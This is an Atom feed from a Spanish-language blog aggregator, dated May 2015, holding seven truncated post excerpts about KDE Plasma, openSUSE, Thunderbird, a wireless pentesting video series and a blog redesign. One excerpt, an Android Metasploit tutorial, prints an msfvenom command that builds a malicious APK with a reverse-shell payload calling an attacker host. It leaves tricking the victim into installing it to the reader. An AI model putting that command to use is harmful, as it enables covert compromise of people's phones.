<?xml version="1.0" encoding="UTF-8"?>
<feed xmlns="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <title>Blog Stack</title>
  <link rel="alternate" href="http://www.blogstack.info" />
  <subtitle>Un poco más que un agregador/planeta de bitácoras sobre programación, desarrollo, software libre, gnu/linux, tecnología, ...</subtitle>
  <updated>2015-05-17T11:54:39Z</updated>
  <dc:creator>Blog Stack</dc:creator>
  <dc:date>2015-05-17T11:54:39Z</dc:date>
  <dc:language>es</dc:language>
  <entry>
    <title>Arquetype GNU/Linux Breeze, primer nuevo tema para Plasma 5</title>
    <link rel="alternate" href="http://www.blogstack.info/post/kdeblog/2015/05/arquetype-gnu-linux-breeze-primer-nuevo-tema-para-plasma-5" />
    <category term="plasma-5" />
    <category term="kde" />
    <category term="tema" />
    <category term="diseno" />
    <author>
      <name>baltolkien</name>
    </author>
    <updated>2015-05-17T05:42:41Z</updated>
    <published>2015-05-17T05:42:41Z</published>
    <content type="html">&lt;p&gt;La llegada de Plasma 5 significa poner a cero prácticamaente todos los recursos gráficos auxiliares que tenía nuestro viejo escritorio. Además, los diseñadores deben aprender las nuevas formas de crear temas, plasmoides, iconos  y demás decoraciones, esto requiere tiempo de aprendizaje. Por ello es motivo de alegría anunciar que ya tenemos Arquetype GNU/Linux Breeze, el primer tema nuevo tema para Plasma 5. Arquetype GNU/Linux Breeze De la mano de ArquetypeLinux (un diseñador español) nos llega su Arquetype GNU/Linux Breeze, el primer tema para Plasma 5 aparecida en KDE-Look. Su aspecto, como podemos ver en la imagen inferior, no puede ser más elegante. Para instalar Arquetype GNU/Linux basta seguir los siguientes pasos: Descargar el archivo Descompimir el archivo Copiar y pegar la carpeta[...]&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.blogstack.info/post/kdeblog/2015/05/arquetype-gnu-linux-breeze-primer-nuevo-tema-para-plasma-5"&gt;Leer artículo completo &amp;gt;&amp;gt;&lt;/a&gt;&lt;/p&gt;</content>
    <dc:creator>baltolkien</dc:creator>
    <dc:date>2015-05-17T05:42:41Z</dc:date>
  </entry>
  <entry>
    <title>Plasma 5.3 llega a #openSUSE Tumbleweed</title>
    <link rel="alternate" href="http://www.blogstack.info/post/victorhckinthefreeworld/2015/05/plasma-5-3-llega-a-opensuse-tumbleweed" />
    <category term="noticias" />
    <category term="opensuse" />
    <category term="plasma" />
    <category term="tumbleweed" />
    <author>
      <name>victorhck</name>
    </author>
    <updated>2015-05-16T23:17:04Z</updated>
    <published>2015-05-16T23:17:04Z</published>
    <content type="html">&lt;p&gt;openSUSE Tumbleweed está de estreno, ya está disponible Plasma 5.3 El applet actualizador de openSUSE anunciaba una nueva remesa de actualizaciones, y al correo me llegó la notificación de nuevas actualizaciones de Tumbleweed. Pero hasta que no les eché un vistazo no caí en la cuenta que era la esperada actualización a Plasma 5.3 la esperada evolución del escritorio de KDE. Así que a abrir una consola y lanzar un zypper up lo antes posible. Zypper anuncia que se actualizarán cerca de 500 paquetes. Pues aceptamos y le dejamos hacer su trabajo. Bastante tiempo después termina, y toca reiniciar el PC para descubrir si después de esta importante actualización, todo está funcionando normalmente. Y aparece el nuevo Plasma en openSUSE Tumbleweed, y todo funcionando sin problemas!! Bueno, salvo que[...]&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.blogstack.info/post/victorhckinthefreeworld/2015/05/plasma-5-3-llega-a-opensuse-tumbleweed"&gt;Leer artículo completo &amp;gt;&amp;gt;&lt;/a&gt;&lt;/p&gt;</content>
    <dc:creator>victorhck</dc:creator>
    <dc:date>2015-05-16T23:17:04Z</dc:date>
  </entry>
  <entry>
    <title>Como añadir una cuenta de correo a Thunderbird en Ubuntu</title>
    <link rel="alternate" href="http://www.blogstack.info/post/elblogdeliher/2015/05/como-anadir-una-cuenta-de-correo-a-thunderbird-en-ubuntu" />
    <category term="anadir" />
    <category term="correo" />
    <category term="thunderbird" />
    <category term="ubuntu" />
    <author>
      <name>Liher</name>
    </author>
    <updated>2015-05-16T22:22:23Z</updated>
    <published>2015-05-16T22:22:23Z</published>
    <content type="html">&lt;p&gt;Hace poco os hable de un programa de correo que viene instalado en Ubuntu por defecto y que se llama Thunderbird, en dicho articulo os hablaba de las razones por las cuales lo uso y se ha convertido en imprescindible para mi. Pues bien, hoy os voy a mostrar como podéis añadir una cuenta de correo a Thunderbird en Ubuntu paso a paso con un ejemplo. Es bastante sencillo de hacer pero si no lo habéis hecho nunca os podéis perder un poco. Lo primero que necesitamos en nuestra direccion de correo electronico y su contraseña, eso sera suficiente para añadir la cuenta a Thunderbird. En mi caso voy a hacer el proceso con la cuenta de correo de contacto que uso en el blog y lo voy a hacer en una maquina virtual, en dicha maquina virtual no uso el programa de correo y, por lo tanto, estará vacío. Entonces[...]&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.blogstack.info/post/elblogdeliher/2015/05/como-anadir-una-cuenta-de-correo-a-thunderbird-en-ubuntu"&gt;Leer artículo completo &amp;gt;&amp;gt;&lt;/a&gt;&lt;/p&gt;</content>
    <dc:creator>Liher</dc:creator>
    <dc:date>2015-05-16T22:22:23Z</dc:date>
  </entry>
  <entry>
    <title>Comprometiendo un Equipo Android con Metasploit</title>
    <link rel="alternate" href="http://www.blogstack.info/post/jsitech/2015/05/comprometiendo-un-equipo-android-con-metasploit" />
    <category term="metasploit" />
    <category term="ethical-hacking" />
    <category term="android" />
    <category term="seguridad" />
    <category term="msfvenom" />
    <author>
      <name>Jason Soto</name>
    </author>
    <updated>2015-05-16T22:13:52Z</updated>
    <published>2015-05-16T22:13:52Z</published>
    <content type="html">&lt;p&gt;Una de mis herramientas de seguridad favorita es Metasploit, y es por todas las funcionalidades que este framework nos da para realizar pruebas de seguridad a diversas plataformas. Hoy vamos a ver como podemos comprometer un equipo Android simplemente creando un APK malicioso que haga una conexión a nuestra máquina atacante, solo veremos lo de crear el ataque, la parte de lograr que su usuario instale y ejecute el APK, se los dejo a ustedes. Este post lo realizo usando, un Motorola con Android 4.4, Kali Linux y Metasploit. Para crear el APK Malicioso vamos a utilizar MSFvenom y nuestra máquina atacante es la 10.0.0.11 Creamos el Archivo Malicioso # msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.0.11 LPORT=4444 &gt; kali.apk Si verificamos, nos creo un archivo kali.apk, este es el que debemos[...]&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.blogstack.info/post/jsitech/2015/05/comprometiendo-un-equipo-android-con-metasploit"&gt;Leer artículo completo &amp;gt;&amp;gt;&lt;/a&gt;&lt;/p&gt;</content>
    <dc:creator>Jason Soto</dc:creator>
    <dc:date>2015-05-16T22:13:52Z</dc:date>
  </entry>
  <entry>
    <title>Cápsulas de Seguridad Informática – Wireless Pentesting desde 0</title>
    <link rel="alternate" href="http://www.blogstack.info/post/jsitech/2015/05/capsulas-de-seguridad-informatica-wireless-pentesting-desde" />
    <category term="ethical-hacking" />
    <category term="seguridad" />
    <category term="capsulassi" />
    <category term="pentesting" />
    <category term="wireless" />
    <author>
      <name>Jason Soto</name>
    </author>
    <updated>2015-05-16T17:31:16Z</updated>
    <published>2015-05-16T17:31:16Z</published>
    <content type="html">&lt;p&gt;Hoy les presento una nueva cápsula con una temática bastante interesante, y es que Snifer anda muy inalámbrico ultimamente ya que anda preparándose para rendir una certificación de Offensive Security, OSWP. Es por esta razón que creó esta sección de las cápsulas dedicado al Pentesting de Redes Wireless. Un tema muy interesante y se que muchos le sacarán provecho. Aquí los dejo con los 2 videos que ya están disponible, pero antes quiero decir, que todo lo que vean en las cápsulas es para fines educativos y todos los ataques deben ser ejecutados en un ambiente de pruebas o donde tengan la autorización para hacerlo. Presentación de la Cápsula Wireless Pentesting desde 0 Wireless Pentesting desde 0 – Configurando Nuestro Laboratorio Wireless Aquí les dejo las otras series que estamos llevando.[...]&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.blogstack.info/post/jsitech/2015/05/capsulas-de-seguridad-informatica-wireless-pentesting-desde"&gt;Leer artículo completo &amp;gt;&amp;gt;&lt;/a&gt;&lt;/p&gt;</content>
    <dc:creator>Jason Soto</dc:creator>
    <dc:date>2015-05-16T17:31:16Z</dc:date>
  </entry>
  <entry>
    <title>Calendario de lanzamientos de KDE Aplicaciones 15.08</title>
    <link rel="alternate" href="http://www.blogstack.info/post/kdeblog/2015/05/calendario-de-lanzamientos-de-kde-aplicaciones-15-8" />
    <category term="kde" />
    <category term="kde-aplicaciones-15-8" />
    <author>
      <name>baltolkien</name>
    </author>
    <updated>2015-05-16T13:11:21Z</updated>
    <published>2015-05-16T13:11:21Z</published>
    <content type="html">&lt;p&gt;Ya ha pasado más de mes desde que fue lanzado KDE Aplicaciones 15.04 pero el equipo de desarrollo de KDE no da por terminado su trabajo infinito (en relaidad, no es posible) y acaban de publicar el calendario de lanzamientos de KDE Aplicaciones 15.08. Tener un plan de trabajo pre-establecido es algo fundamental para que los equipos funcionen. Este calendario de trabajo debe contener la respuesta a dos preguntas muy explícitas: qué hay que hacer y cuándo debe estar hecho. Además, en sus aplicaciones internas se reponde a otra pregunta que también es súmamente importante: quien lo va a hacer. Esta metodología de trabajo la tienen perfectamente clara los desarrolladores de KDE que, como viene siendo habitual, no solo se lo marcan en sus agendas sino que lo hacen público. Calendario de lanzamientos[...]&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.blogstack.info/post/kdeblog/2015/05/calendario-de-lanzamientos-de-kde-aplicaciones-15-8"&gt;Leer artículo completo &amp;gt;&amp;gt;&lt;/a&gt;&lt;/p&gt;</content>
    <dc:creator>baltolkien</dc:creator>
    <dc:date>2015-05-16T13:11:21Z</dc:date>
  </entry>
  <entry>
    <title>Nuevo diseño en Blog Bitix</title>
    <link rel="alternate" href="http://www.blogstack.info/post/blogbitix/2015/05/nuevo-diseno-en-blog-bitix" />
    <category term="blog-stack" />
    <category term="blog" />
    <category term="planeta-linux" />
    <category term="planeta-codigo" />
    <author>
      <name>pico.dev</name>
    </author>
    <updated>2015-05-16T10:00:00Z</updated>
    <published>2015-05-16T10:00:00Z</published>
    <content type="html">&lt;p&gt;En diciembre de 2013 pasé de utilizar Blogger a usar Octopress creando la bitácora Blog Bitix. Octopress fue una gran mejora a la hora de editar el contenido y gestionar las imágenes o trozos de código con gist. Hace relativamente poco que he pasado a utilizar Octopress pero desde hace un tiempo quería personalizar mucho más el diseño de la bitácora. Estaba esperando a ver como avanzaba el desarrollo de la siguiente versión sin embargo va lentamente por mucho que hayan dicho ya en el 15 de enero que Octopress 3 de está en camino, aún en mayo no hay ninguna nueva noticia desde entonces. Posiblemente usando Jekyll directamente (Octopress está basado en Jekyll) podría conseguir el nivel de personalización que quería. Sin embargo, revisando otras opciones dí con otra plataforma de generación de[...]&lt;/p&gt;&lt;p&gt;&lt;a href="http://www.blogstack.info/post/blogbitix/2015/05/nuevo-diseno-en-blog-bitix"&gt;Leer artículo completo &amp;gt;&amp;gt;&lt;/a&gt;&lt;/p&gt;</content>
    <dc:creator>pico.dev</dc:creator>
    <dc:date>2015-05-16T10:00:00Z</dc:date>
  </entry>
</feed>

